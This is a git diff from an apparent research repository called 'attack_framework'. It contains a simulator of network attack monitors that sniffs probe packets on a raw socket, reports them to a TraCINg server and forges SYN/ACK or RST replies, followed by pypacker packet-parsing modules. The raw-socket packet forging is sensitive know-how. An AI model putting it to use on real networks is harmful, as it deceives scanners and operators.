+			#logger.debug(ip_bytes)
+			# feedback: RST or SYN/ACK
+			#print(ip_bytes)
+			self._listening_ips[ip_bytes] = [None, is_monitor_ip]
+
+	def _create_clustered_monitors(self, target_amount):
+		"""
+		Create clustered IP addresses by generating sequential addresses using
+		pareto and exponential distributions.
+
+		target_amount -- target amount of IP addresses for _listening_ips
+		"""
+		logger.info("creating %d random clustered IPs" % self._amount_monitors)
+		# classical pareto by "scale=m=1"
+		#s = np.random.pareto(a, 10000) + m
+		# shape = a = 1.x, scale = 1 (not adjusted), location = 1 (min value 1)
+		# mean = sum/length = shape * scale / (shape - 1)
+		# -> a=2.1: mean=~1.9
+		# -> a=1.1: mean=~10
+		# -> a=1.01: mean=~100
+		pareto = np.random.pareto
+		pareto_shape = 1.01
+		exponential = np.random.exponential
+		# mean=scale
+		exponential_scale = 200
+		current_ip = 0
+		ip_max = self._host_addresses_mask - 10000
+
+		if ip_max < 0:
+			logger.warning("address range too small: %d<%d, will not create any monitors" %
+							(self._host_addresses_mask, 10000))
+			return
+
+		while len(self._listening_ips) < target_amount and current_ip < ip_max:
+			sequential_add = int(pareto(pareto_shape) + 1)
+			#logger.debug(sequential_add)
+			# "ip_int" avoids shadowing the pypacker "ip" module imported above
+			for ip_int in range(current_ip, current_ip + sequential_add):
+				ip_bytes = packipv4(ip_int)
+				self._listening_ips[ip_bytes] = [None, True]
+			current_ip += sequential_add + int(exponential(scale=exponential_scale))
+
+		if len(self._listening_ips) < target_amount:
+			logger.warning("could not create enough monitors (to small range?) %d < %d" %
+							(len(self._listening_ips), target_amount))
+
+	def _packet_collect_cycler(self, procnum, sockethndl, queue, ip_whitelist):
+		"""
+		Collects packets and puts them into the Queue if the destination IP address
+		matches an address in ip_whitelist.
+
+		sockethndl -- A SocketHandler to read bytes from
+		queue -- A queue to write bytes to if a destination IP address matches
+		ip_whitelist -- A dictionary posing as a whitelist
+		"""
+		logger.debug("starting listening process Nr. %d" % procnum)
+
+		psock_recv = sockethndl._socket_recv.recv
+		queue_put = queue.put
+		cnt = 0
+		last_cnt = 0
+
+		while True:
+			try:
+				bts = psock_recv(64)
+				cnt += 1
+				# logger.debug("...")
+				# time.sleep(1)
+				# dst IP at Ethernet header (14 bytes) + IPv4 dst offset (16 bytes)
+				if bts[14 + 16: 14 + 16 + 4] not in ip_whitelist:
+					continue
+				#logger.debug("!!!!!!! got a packet")
+				queue_put(bts)
+			except socket.timeout:
+				# logger.debug("read timeout..")
+				if last_cnt != cnt:
+					logger.debug("collector %d: amount of probes to NW=%d" % (procnum, cnt))
+					last_cnt = cnt
+				#continue
+
+	def _attack_reaction_cycler(self, procnum, socket_write, queue, requests_session, url_tracing, listening_ips):
+		"""
+		Examines packets in the buffer and reacts on SYN-pings for
+		specific target IPs. Possible reactions are: sending attack
+		events to TraCINg and/or feedback on scanner level
+		"""
+		logger.debug("starting reaction process No. %d" % procnum)
+		cnt = 0
+
+		while True:
+			bts = queue.get()
+
+			try:
+				packet = Ethernet(bts)
+			except:
+				logger.warning("could not parse received packet:\n%r" % bts)
+				store_packets([bts])
+				continue
+			ip_bytes = packet[ip.IP].dst
+
+			# this is a monitor, send event to TraCINg
+			if listening_ips[ip_bytes][1]:
+				cnt += 1
+
+				try:
+					#if packet.body_handler.dst not in listening_ips:
+					#	continue
+
+					p_ip = packet.ip
+					p_tcp = p_ip.tcp
+
+					if cnt % 500 == 0:
+						logger.debug("%d> %d: monitor was scanned: %s:%d -> %s:%d" %
+									(procnum, cnt, p_ip.src_s, p_tcp.sport, p_ip.dst_s, p_tcp.dport))
+
+					"""
+					Inform TraCINg about an attack.
+					"""
+					post_data_dict = {
+								"sensor": {
+									"name": "monitorsimulation_" + packet[ip.IP].dst_s,
+									"type": "Honeypot"},
+								"src": {
+									"ip": packet[ip.IP].src_s,
+									"port": "%d" % packet[tcp.TCP].sport},
+								"dst": {
+									"ip": packet[ip.IP].dst_s,
+									"port": "%d" % packet[tcp.TCP].dport},
+								"type": 11,
+								"log": "Predefined Log",
+								"md5sum": "7867de13bf22a7f3e3559044053e33e7",
+								"date": ("%d" % time.time())
+					}
+
+					#headers = {"Content-type": "application/x-www-form-urlencoded",
+					#	"Accept": "text/plain"}
+
+					post_data = json.dumps(post_data_dict)
+					# logger.debug("POST data:")
+					# logger.debug(post_data)
+					requests_session.post(url=url_tracing, data=post_data, verify=False, stream=False)
+
+					# response = conn.getresponse()
+					#logger.debug(response)
+					#conn = http.client.HTTPSConnection(self._tracing_host, self._tracing_port)
+					#conn.request("POST", self._tracing_path, body=post_data)
+					#logger.warning("attack event sent to TraCINg, monitor: %s" % packet[ip.IP].dst_s)
+				except Exception as ex:
+					logger.warning("could not inform TraCINg: %r" % ex)
+
+			try:
+				responsetype = listening_ips[ip_bytes][0]
+
+				if responsetype == RESPONSETYPE_NONE:
+					continue
+
+				elif responsetype in RESPONSETYPES_TCP:
+					tcp_packet = packet.body_handler.body_handler
+					tcp_packet.ack = tcp_packet.seq + 1
+					tcp_packet.seq = 12345
+					tcp_packet.flags = tcp.TH_SYN | tcp.TH_ACK if responsetype == RESPONSETYPE_TCP_SYNACK else tcp.TH_RST
+					packet.reverse_all_address()
+					#socket_write.send(packet.bin())
+					socket_write.send(packet.bin(update_auto_fields=False))
+				elif responsetype == RESPONSETYPE_ICMP:
+					# TODO: ICMP indicates unreachable hosts, ignore
+					pass
+				else:
+					logger.warning("unknown response type for %s: %r" % (packet.ip.dst_s, responsetype))
+			except Exception as ex:
+				logger.warning("could not send scanner feedback: %r" % ex)
+		logger.debug("reaction cycler is terminating")
+
+if __name__ == "__main__":
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-i", "--interface", help="Interface to listen on", default="eth10")
+	parser.add_argument("-m", "--monitors", help="Amount of monitors to be simulated", type=int, default=1000)
+	parser.add_argument("-r", "--cidrbits", help="CIDR bits of simulated network", type=int, default=0)
+	parser.add_argument("-c", "--cluster", help="Create clustered monitors", type=bool, default=False)
+	parser.add_argument("-f", "--monitorfeedback", help="Probability for monitor feedback", type=float, default=0.9)
+	parser.add_argument("-n", "--nonmonitors", help="Amount of non-monitors to be simulated", type=int, default=0)
+	parser.add_argument("-d", "--nwdrop", help="Probability for network drops", type=float, default=0)
+	parser.add_argument("-b", "--buffersize", help="Buffer to be used for storing received packets", type=int, default=1000000)
+	parser.add_argument("-s", "--seed", help="Seed to be used to distribute nodes", type=int, default=123456789)
+	parser.add_argument("-u", "--url", help="HTTPS URL of TraCINg to send events to", default="https://localhost:443")
+	args = parser.parse_args()
+
+	monitor_ips_init = []
+
+	logger.info("amount of CPUs: %d" % multiprocessing.cpu_count())
+
+	monitorsimulator = MonitorSimulator(
+			amount_monitors=args.monitors,
+			cidr_bits=args.cidrbits,
+			amount_non_monitors=args.nonmonitors,
+			monitor_ips=monitor_ips_init,
+			interface_name=args.interface,
+			buffer_size=args.buffersize,
+			url_tracing=args.url,
+			cluster_monitors=args.cluster,
+			prop_mon_scannerfeedback=args.monitorfeedback,
+			prop_nwdrop=args.nwdrop)
+
+	input("press enter to continue")
+	monitorsimulator.start()
+	print("")
+	user_input = None
+
+	while user_input != "quit":
+		user_input = input("enter 'quit' to quit, 'check' to compare monitors to those in %s\n" % monitorsimulator._file_identified_monitors)
+		if user_input == "check":
+			monitorsimulator.check_matches()
+		else:
+			logger.debug("%d" % monitorsimulator._queue.qsize())
+
+	print("")
+	logger.debug("stopping simulation")
+	monitorsimulator.stop()

+ 0 - 0
attack_framework/pypacker/__init__.py


BIN
attack_framework/pypacker/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/checksum.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/checksum.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/pcapng.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/ppcap.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/ppcap.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/psocket.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/psocket.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker_meta.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/pypacker_meta.cpython-34.pyc


BIN
attack_framework/pypacker/__pycache__/triggerlist.cpython-33.pyc


BIN
attack_framework/pypacker/__pycache__/triggerlist.cpython-34.pyc


+ 153 - 0
attack_framework/pypacker/checksum.py

@@ -0,0 +1,153 @@
+import array
+import socket
+import struct
+
+# avoid references for performance reasons
+unpack = struct.unpack
+unpack_word_be = struct.Struct(">H").unpack
+array_call = array.array
+ntohs = socket.ntohs
+
+# TCP (RFC 793) and UDP (RFC 768) checksum
+
+
+def in_cksum_add(s, buf):
+	"""Add checksum value to the given value s."""
+	n = len(buf)
+	# logger.debug("buflen for checksum: %d" % n)
+	cnt = int(n / 2) * 2
+	# logger.debug("slicing at: %d, %s" % (cnt, type(cnt)))
+	a = array_call("H", buf[:cnt])
+	# logger.debug("2-byte values: %s" % a)
+	# logger.debug(buf[-1].to_bytes(1, byteorder='big'))
+
+	if cnt != n:
+		#a.append(unpack_word_be( buf[-1].to_bytes(1, byteorder="big") + b"\x00" )[0])
+		a.append(unpack_word_be( buf[-1:] + b"\x00" )[0])
+	return s + sum(a)
+
+
+def in_cksum_done(s):
+	"""Complete checksum building."""
+	# add carry to sum itself
+	s = (s >> 16) + (s & 0xffff)
+	s += (s >> 16)
+	# return one's complement of the sum
+	return ntohs(~s & 0xffff)
+
+
+def in_cksum(buf):
+	"""Return computed Internet Protocol checksum."""
+	return in_cksum_done(in_cksum_add(0, buf))
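+
+# Usage sketch (illustrative): the checksum can be built incrementally over
+# several buffers and finalized once:
+#   s = in_cksum_add(0, pseudo_header_bytes)
+#   s = in_cksum_add(s, segment_bytes)
+#   checksum = in_cksum_done(s)
+# or in one step over a single buffer: in_cksum(buf)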
+
+
+# CRC-32C Checksum
+# http://tools.ietf.org/html/rfc3309
+
+crc32c_table = (
+	0x00000000, 0xF26B8303, 0xE13B70F7, 0x1350F3F4, 0xC79A971F,
+	0x35F1141C, 0x26A1E7E8, 0xD4CA64EB, 0x8AD958CF, 0x78B2DBCC,
+	0x6BE22838, 0x9989AB3B, 0x4D43CFD0, 0xBF284CD3, 0xAC78BF27,
+	0x5E133C24, 0x105EC76F, 0xE235446C, 0xF165B798, 0x030E349B,
+	0xD7C45070, 0x25AFD373, 0x36FF2087, 0xC494A384, 0x9A879FA0,
+	0x68EC1CA3, 0x7BBCEF57, 0x89D76C54, 0x5D1D08BF, 0xAF768BBC,
+	0xBC267848, 0x4E4DFB4B, 0x20BD8EDE, 0xD2D60DDD, 0xC186FE29,
+	0x33ED7D2A, 0xE72719C1, 0x154C9AC2, 0x061C6936, 0xF477EA35,
+	0xAA64D611, 0x580F5512, 0x4B5FA6E6, 0xB93425E5, 0x6DFE410E,
+	0x9F95C20D, 0x8CC531F9, 0x7EAEB2FA, 0x30E349B1, 0xC288CAB2,
+	0xD1D83946, 0x23B3BA45, 0xF779DEAE, 0x05125DAD, 0x1642AE59,
+	0xE4292D5A, 0xBA3A117E, 0x4851927D, 0x5B016189, 0xA96AE28A,
+	0x7DA08661, 0x8FCB0562, 0x9C9BF696, 0x6EF07595, 0x417B1DBC,
+	0xB3109EBF, 0xA0406D4B, 0x522BEE48, 0x86E18AA3, 0x748A09A0,
+	0x67DAFA54, 0x95B17957, 0xCBA24573, 0x39C9C670, 0x2A993584,
+	0xD8F2B687, 0x0C38D26C, 0xFE53516F, 0xED03A29B, 0x1F682198,
+	0x5125DAD3, 0xA34E59D0, 0xB01EAA24, 0x42752927, 0x96BF4DCC,
+	0x64D4CECF, 0x77843D3B, 0x85EFBE38, 0xDBFC821C, 0x2997011F,
+	0x3AC7F2EB, 0xC8AC71E8, 0x1C661503, 0xEE0D9600, 0xFD5D65F4,
+	0x0F36E6F7, 0x61C69362, 0x93AD1061, 0x80FDE395, 0x72966096,
+	0xA65C047D, 0x5437877E, 0x4767748A, 0xB50CF789, 0xEB1FCBAD,
+	0x197448AE, 0x0A24BB5A, 0xF84F3859, 0x2C855CB2, 0xDEEEDFB1,
+	0xCDBE2C45, 0x3FD5AF46, 0x7198540D, 0x83F3D70E, 0x90A324FA,
+	0x62C8A7F9, 0xB602C312, 0x44694011, 0x5739B3E5, 0xA55230E6,
+	0xFB410CC2, 0x092A8FC1, 0x1A7A7C35, 0xE811FF36, 0x3CDB9BDD,
+	0xCEB018DE, 0xDDE0EB2A, 0x2F8B6829, 0x82F63B78, 0x709DB87B,
+	0x63CD4B8F, 0x91A6C88C, 0x456CAC67, 0xB7072F64, 0xA457DC90,
+	0x563C5F93, 0x082F63B7, 0xFA44E0B4, 0xE9141340, 0x1B7F9043,
+	0xCFB5F4A8, 0x3DDE77AB, 0x2E8E845F, 0xDCE5075C, 0x92A8FC17,
+	0x60C37F14, 0x73938CE0, 0x81F80FE3, 0x55326B08, 0xA759E80B,
+	0xB4091BFF, 0x466298FC, 0x1871A4D8, 0xEA1A27DB, 0xF94AD42F,
+	0x0B21572C, 0xDFEB33C7, 0x2D80B0C4, 0x3ED04330, 0xCCBBC033,
+	0xA24BB5A6, 0x502036A5, 0x4370C551, 0xB11B4652, 0x65D122B9,
+	0x97BAA1BA, 0x84EA524E, 0x7681D14D, 0x2892ED69, 0xDAF96E6A,
+	0xC9A99D9E, 0x3BC21E9D, 0xEF087A76, 0x1D63F975, 0x0E330A81,
+	0xFC588982, 0xB21572C9, 0x407EF1CA, 0x532E023E, 0xA145813D,
+	0x758FE5D6, 0x87E466D5, 0x94B49521, 0x66DF1622, 0x38CC2A06,
+	0xCAA7A905, 0xD9F75AF1, 0x2B9CD9F2, 0xFF56BD19, 0x0D3D3E1A,
+	0x1E6DCDEE, 0xEC064EED, 0xC38D26C4, 0x31E6A5C7, 0x22B65633,
+	0xD0DDD530, 0x0417B1DB, 0xF67C32D8, 0xE52CC12C, 0x1747422F,
+	0x49547E0B, 0xBB3FFD08, 0xA86F0EFC, 0x5A048DFF, 0x8ECEE914,
+	0x7CA56A17, 0x6FF599E3, 0x9D9E1AE0, 0xD3D3E1AB, 0x21B862A8,
+	0x32E8915C, 0xC083125F, 0x144976B4, 0xE622F5B7, 0xF5720643,
+	0x07198540, 0x590AB964, 0xAB613A67, 0xB831C993, 0x4A5A4A90,
+	0x9E902E7B, 0x6CFBAD78, 0x7FAB5E8C, 0x8DC0DD8F, 0xE330A81A,
+	0x115B2B19, 0x020BD8ED, 0xF0605BEE, 0x24AA3F05, 0xD6C1BC06,
+	0xC5914FF2, 0x37FACCF1, 0x69E9F0D5, 0x9B8273D6, 0x88D28022,
+	0x7AB90321, 0xAE7367CA, 0x5C18E4C9, 0x4F48173D, 0xBD23943E,
+	0xF36E6F75, 0x0105EC76, 0x12551F82, 0xE03E9C81, 0x34F4F86A,
+	0xC69F7B69, 0xD5CF889D, 0x27A40B9E, 0x79B737BA, 0x8BDCB4B9,
+	0x988C474D, 0x6AE7C44E, 0xBE2DA0A5, 0x4C4623A6, 0x5F16D052,
+	0xAD7D5351
+)
+
+
+def crc32_add(crc, buf):
+	# buf = array.array("B", buf)
+	i = 0
+	while i < len(buf):
+		# crc = (crc >> 8) ^ crc32c_table[(crc ^ b) & 0xff]
+		crc = (crc >> 8) ^ crc32c_table[(crc ^ buf[i]) & 0xff]
+		i += 1
+	return crc
+
+
+def crc32_done(crc):
+	tmp = ~crc & 0xffffffff
+	b0 = tmp & 0xff
+	b1 = (tmp >> 8) & 0xff
+	b2 = (tmp >> 16) & 0xff
+	b3 = (tmp >> 24) & 0xff
+	crc = (b0 << 24) | (b1 << 16) | (b2 << 8) | b3
+	return crc
+
+
+def crc32_cksum(buf):
+	"""Return computed CRC-32c checksum."""
+	return crc32_done(crc32_add(0xffffffff, buf))
+
+
+def fletcher32(data_to_checksum, amount_words):
+	# 1 word = 2 Bytes
+	sum1 = 0xffff
+	sum2 = 0xffff
+	datapos = 0
+
+	while amount_words > 0:
+		tlen = 359 if amount_words > 359 else amount_words
+		amount_words -= tlen
+
+		while tlen > 0:
+			# sum1 += unpack_word_be(data_to_checksum[datapos:datapos+2])[0]
+			# print("%d" % sum1)
+			sum1 += unpack_word_be(data_to_checksum[datapos: datapos + 2])[0]
+			datapos += 2
+			sum2 += sum1
+			# print("%d" % sum1)
+			# print("%d" % sum2)
+			# print("--")
+			tlen -= 1
+		sum1 = (sum1 & 0xffff) + (sum1 >> 16)
+		sum2 = (sum2 & 0xffff) + (sum2 >> 16)
+	# Second reduction step to reduce sums to 16 bits
+	sum1 = (sum1 & 0xffff) + (sum1 >> 16)
+	sum2 = (sum2 & 0xffff) + (sum2 >> 16)
+	return (sum2 << 16) | sum1

+ 0 - 0
attack_framework/pypacker/layer12/__init__.py


BIN
attack_framework/pypacker/layer12/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/arp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/arp.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/dtp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/dtp.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ethernet.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ieee80211.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/linuxcc.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/llc.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/llc.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ppp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/ppp.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/pppoe.cpython-34.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/prism.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/radiotap.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/stp.cpython-33.pyc


BIN
attack_framework/pypacker/layer12/__pycache__/vrrp.cpython-33.pyc


+ 36 - 0
attack_framework/pypacker/layer12/arp.py

@@ -0,0 +1,36 @@
+"""Address Resolution Protocol."""
+
+from pypacker import pypacker
+
+# Hardware address format
+ARP_HRD_ETH	= 0x0001		# ethernet hardware
+ARP_HRD_IEEE802	= 0x0006		# IEEE 802 hardware
+
+# Protocol address format
+ARP_PRO_IP	= 0x0800		# IP protocol
+
+# ARP operation
+ARP_OP_REQUEST		= 1		# request to resolve ha given pa
+ARP_OP_REPLY		= 2		# response giving hardware address
+ARP_OP_REVREQUEST	= 3		# request to resolve pa given ha
+ARP_OP_REVREPLY		= 4		# response giving protocol address
+
+
+class ARP(pypacker.Packet):
+	__hdr__ = (
+		("hrd", "H", ARP_HRD_ETH),
+		("pro", "H", ARP_PRO_IP),
+		("hln", "B", 6),			# hardware address length
+		("pln", "B", 4),			# protocol address length
+		("op", "H", ARP_OP_REQUEST),
+		("sha", "6s", b"\x00" * 6),		# sender mac
+		("spa", "4s", b"\x00" * 6),		# sender ip
+		("tha", "6s", b"\x00" * 6),		# target mac
+		("tpa", "4s", b"\x00" * 6)		# target ip
+	)
+
+	# convenient access
+	sha_s = pypacker.get_property_mac("sha")
+	spa_s = pypacker.get_property_ip4("spa")
+	tha_s = pypacker.get_property_mac("tha")
+	tpa_s = pypacker.get_property_ip4("tpa")
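+
+# Example (sketch, assuming pypacker's keyword-based Packet constructor):
+# arp_req = ARP(op=ARP_OP_REQUEST, sha_s="AA:BB:CC:DD:EE:FF",
+# 	spa_s="192.168.0.1", tpa_s="192.168.0.2")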

+ 37 - 0
attack_framework/pypacker/layer12/dtp.py

@@ -0,0 +1,37 @@
+"""Dynamic Trunking Protocol."""
+
+from pypacker import pypacker, triggerlist
+
+import struct
+
+TRUNK_NAME	= 0x01
+MAC_ADDR	= 0x04
+
+
+class DTP(pypacker.Packet):
+	__hdr__ = (
+		("v", "B", 0),
+		("tvs", None, triggerlist.TriggerList)
+	)
+
+	def _dissect(self, buf):
+		off = 1
+		dlen = len(buf)
+		tvs = []
+
+		while off < dlen:
+			# length: inclusive header
+			_, tv_len = struct.unpack(">HH", buf[off: off + 4])
+			packet = TV(buf[off: off + tv_len])
+			tvs.append(packet)
+			off += tv_len
+
+		self.tvs.extend(tvs)
+		return dlen
+
+
+class TV(pypacker.Packet):
+	__hdr__ = (
+		("t", "H", 0),
+		("len", "H", 0)
+	)

+ 189 - 0
attack_framework/pypacker/layer12/ethernet.py

@@ -0,0 +1,189 @@
+"""
+Ethernet II, IEEE 802.3
+
+RFC 1042
+"""
+
+from pypacker import pypacker
+
+import logging
+import struct
+
+# avoid unneeded references for performance reasons
+pack = struct.pack
+unpack = struct.unpack
+
+logger = logging.getLogger("pypacker")
+
+ETH_CRC_LEN	= 4
+ETH_HDR_LEN	= 14
+
+ETH_LEN_MIN	= 64		# minimum frame length with CRC
+ETH_LEN_MAX	= 1518		# maximum frame length with CRC
+
+ETH_MTU		= (ETH_LEN_MAX - ETH_HDR_LEN - ETH_CRC_LEN)
+ETH_MIN		= (ETH_LEN_MIN - ETH_HDR_LEN - ETH_CRC_LEN)
+
+# Ethernet payload types - http://standards.ieee.org/regauth/ethertype
+ETH_TYPE_PUP		= 0x0200		# PUP protocol
+ETH_TYPE_IP		= 0x0800		# IPv4 protocol
+ETH_TYPE_ARP		= 0x0806		# address resolution protocol
+ETH_TYPE_WOL		= 0x0842		# Wake on LAN
+ETH_TYPE_CDP		= 0x2000		# Cisco Discovery Protocol
+ETH_TYPE_DTP		= 0x2004		# Cisco Dynamic Trunking Protocol
+ETH_TYPE_REVARP		= 0x8035		# reverse addr resolution protocol
+ETH_TYPE_ETHTALK	= 0x809B		# Apple Talk
+ETH_TYPE_AARP		= 0x80F3		# Appletalk Address Resolution Protocol
+ETH_TYPE_8021Q		= 0x8100		# IEEE 802.1Q VLAN tagging
+ETH_TYPE_IPX		= 0x8137		# Internetwork Packet Exchange
+ETH_TYPE_NOV		= 0x8138		# Novell
+ETH_TYPE_IP6		= 0x86DD		# IPv6 protocol
+ETH_TYPE_MPLS_UCAST	= 0x8847		# MPLS unicast
+ETH_TYPE_MPLS_MCAST	= 0x8848		# MPLS multicast
+ETH_TYPE_PPOE_DISC	= 0x8863		# PPPoE Discovery
+ETH_TYPE_PPOE_SESS	= 0x8864		# PPPoE Session
+ETH_TYPE_JUMBOF		= 0x8870		# Jumbo Frames
+ETH_TYPE_PROFINET	= 0x8892		# Realtime-Ethernet PROFINET
+ETH_TYPE_ATAOE		= 0x88A2		# ATA over Ethernet
+ETH_TYPE_ETHERCAT	= 0x88A4		# Realtime-Ethernet Ethercat
+ETH_TYPE_PBRIDGE	= 0x88A8		# Provider Bridging
+ETH_TYPE_POWERLINK	= 0x88AB		# Realtime Ethernet POWERLINK
+ETH_TYPE_LLDP		= 0x88CC		# Link Layer Discovery Protocol
+ETH_TYPE_SERCOS		= 0x88CD		# Realtime Ethernet SERCOS III
+ETH_TYPE_FIBRE_ETH	= 0x8906		# Fibre Channel over Ethernet
+ETH_TYPE_FCOE		= 0x8914		# FCoE Initialization Protocol (FIP)
+
+ETH_TYPE_LLC		= 0xFFFFF		# pseudo type (> 0xFFFF): 802.3 frames with LLC header
+
+
+# MPLS label stack fields
+MPLS_LABEL_MASK		= 0xfffff000
+MPLS_QOS_MASK		= 0x00000e00
+MPLS_TTL_MASK		= 0x000000ff
+MPLS_LABEL_SHIFT	= 12
+MPLS_QOS_SHIFT		= 9
+MPLS_TTL_SHIFT		= 0
+MPLS_STACK_BOTTOM	= 0x0100
+
+
+class Ethernet(pypacker.Packet):
+	__hdr__ = (
+		("dst", "6s", b"\xff" * 6),
+		("src", "6s", b"\xff" * 6),
+		("vlan", "4s", None),
+		# ("len", "H", None),
+		("type", "H", ETH_TYPE_IP)		# type = Ethernet II, len = 802.3
+	)
+
+	dst_s = pypacker.get_property_mac("dst")
+	src_s = pypacker.get_property_mac("src")
+
+	def _dissect(self, buf):
+		hlen = 14
+		# we need to check for VLAN TPID here (0x8100) to get correct header-length
+		if buf[12:14] == b"\x81\x00":
+			# logger.debug(">>> got vlan tag")
+			self.vlan = buf[12:16]
+			# logger.debug("re-extracting field: %s" % self.vlan)
+			hlen = 18
+
+		# check for DSAP via length
+		type_len = unpack(">H", buf[12: 14])[0]
+		if type_len < 1536:
+			# assume DSAP is following (802.2 DSAP)
+			# self.len = type_len
+			# deactivate eth_type field
+			# logger.debug(">>> deactivating type")
+			self.type = None
+			self._init_handler(ETH_TYPE_LLC, buf[12: 14])
+			return
+
+		# avoid calling unpack more than once
+		eth_type = unpack(">H", buf[hlen - 2: hlen])[0]
+		# logger.debug("hlen is: %d" % eth_type)
+
+		# handle ethernet-padding: remove it but save for later use
+		# don't use headers for this because this is a rare situation
+		dlen = len(buf) - hlen		# data length [+ padding?]
+
+		try:
+			# this will only work on complete headers: Ethernet + IP + ...
+			# handle padding using IPv4, IPv6
+			# TODO: check for other protocols
+			# logger.debug(">>> checking for padding")
+			if eth_type == ETH_TYPE_IP:
+
+				dlen_ip = unpack(">H", buf[hlen + 2: hlen + 4])[0]		# real data length
+
+				if dlen_ip < dlen:
+					# padding found
+					# logger.debug("got padding for IPv4")
+					self._padding = buf[hlen + dlen_ip:]
+					dlen = dlen_ip
+			# handle padding using IPv6
+			# note: the IPv6 payload length excludes the 40-byte standard header but INCLUDES extension headers!
+			elif eth_type == ETH_TYPE_IP6:
+				dlen_ip = unpack(">H", buf[hlen + 4: hlen + 6])[0]		# real data length
+				if 40 + dlen_ip < dlen:
+					# padding found
+					# logger.debug("got padding for IPv6")
+					self._padding = buf[hlen + 40 + dlen_ip:]
+					dlen = 40 + dlen_ip
+		except struct.error:
+			# logger.debug("could not extract padding info, assuming incomplete ethernet frame")
+			pass
+		except Exception:
+			logger.exception("could not extract padding info")
+
+		self._init_handler(eth_type, buf[hlen: hlen + dlen])
+		return hlen
+
+	def bin(self, update_auto_fields=True):
+		"""Custom bin(): handle padding for Ethernet."""
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields) + self.padding
+
+	def __len__(self):
+		return super().__len__() + len(self.padding)
+
+	def direction(self, other):
+		# logger.debug("checking direction: %s<->%s" % (self, other))
+		if self.dst == other.dst and self.src == other.src:
+			# consider packet to itself: can be DIR_REV
+			return pypacker.Packet.DIR_SAME | pypacker.Packet.DIR_REV
+		elif (self.dst == other.src and self.src == other.dst) or\
+			(self.dst == b"\xff\xff\xff\xff\xff\xff" and other.dst == self.src):		# broadcast
+			return pypacker.Packet.DIR_REV
+		else:
+			return pypacker.Packet.DIR_UNKNOWN
+
+	# handle padding attribute
+	def __get_padding(self):
+		try:
+			return self._padding
+		except AttributeError:
+			return b""
+
+	def __set_padding(self, padding):
+		self._padding = padding
+
+	padding = property(__get_padding, __set_padding)
+
+	def reverse_address(self):
+		self.dst, self.src = self.src, self.dst
+
+# load handler
+from pypacker.layer12 import arp, dtp, pppoe, llc
+from pypacker.layer3 import ip, ip6, ipx
+
+pypacker.Packet.load_handler(Ethernet,
+	{
+		ETH_TYPE_IP: ip.IP,
+		ETH_TYPE_ARP: arp.ARP,
+		ETH_TYPE_DTP: dtp.DTP,
+		ETH_TYPE_IPX: ipx.IPX,
+		ETH_TYPE_IP6: ip6.IP6,
+		ETH_TYPE_PPOE_DISC: pppoe.PPPoE,
+		ETH_TYPE_PPOE_SESS: pppoe.PPPoE,
+		ETH_TYPE_LLC: llc.LLC,
+	}
+)
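+
+# Example (sketch, assuming pypacker's keyword-based Packet constructor):
+# eth = Ethernet(dst_s="FF:FF:FF:FF:FF:FF", src_s="AA:BB:CC:DD:EE:FF", type=ETH_TYPE_IP)
+# eth_parsed = Ethernet(eth.bin())	# VLAN tag and trailing padding are handled in _dissect()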

+ 770 - 0
attack_framework/pypacker/layer12/ieee80211.py

@@ -0,0 +1,770 @@
+"""IEEE 802.11"""
+
+from pypacker import pypacker
+from pypacker import triggerlist
+
+import struct
+import logging
+
+logger = logging.getLogger("pypacker")
+
+# Frame Types
+MGMT_TYPE		= 0
+CTL_TYPE		= 1
+DATA_TYPE		= 2
+
+# Frame Sub-Types
+M_ASSOC_REQ		= 0
+M_ASSOC_RESP		= 1
+M_REASSOC_REQ		= 2
+M_REASSOC_RESP		= 3
+M_PROBE_REQ		= 4
+M_PROBE_RESP		= 5
+M_DISASSOC		= 10
+M_AUTH			= 11
+M_DEAUTH		= 12
+M_ACTION		= 13
+M_BEACON		= 8
+M_ATIM			= 9
+
+C_BLOCK_ACK_REQ		= 8
+C_BLOCK_ACK		= 9
+C_PS_POLL		= 10
+C_RTS			= 11
+C_CTS			= 12
+C_ACK			= 13
+C_CF_END		= 14
+C_CF_END_ACK		= 15
+
+D_NORMAL		= 0
+D_DATA_CF_ACK		= 1
+D_DATA_CF_POLL		= 2
+D_DATA_CF_ACK_POLL	= 3
+D_NULL			= 4
+D_CF_ACK		= 5
+D_CF_POLL		= 6
+D_CF_ACK_POLL		= 7
+D_QOS_DATA		= 8
+D_QOS_CF_ACK		= 9
+D_QOS_CF_POLL		= 10
+D_QOS_CF_ACK_POLL	= 11
+D_QOS_NULL		= 12
+D_QOS_CF_POLL_EMPTY	= 14
+
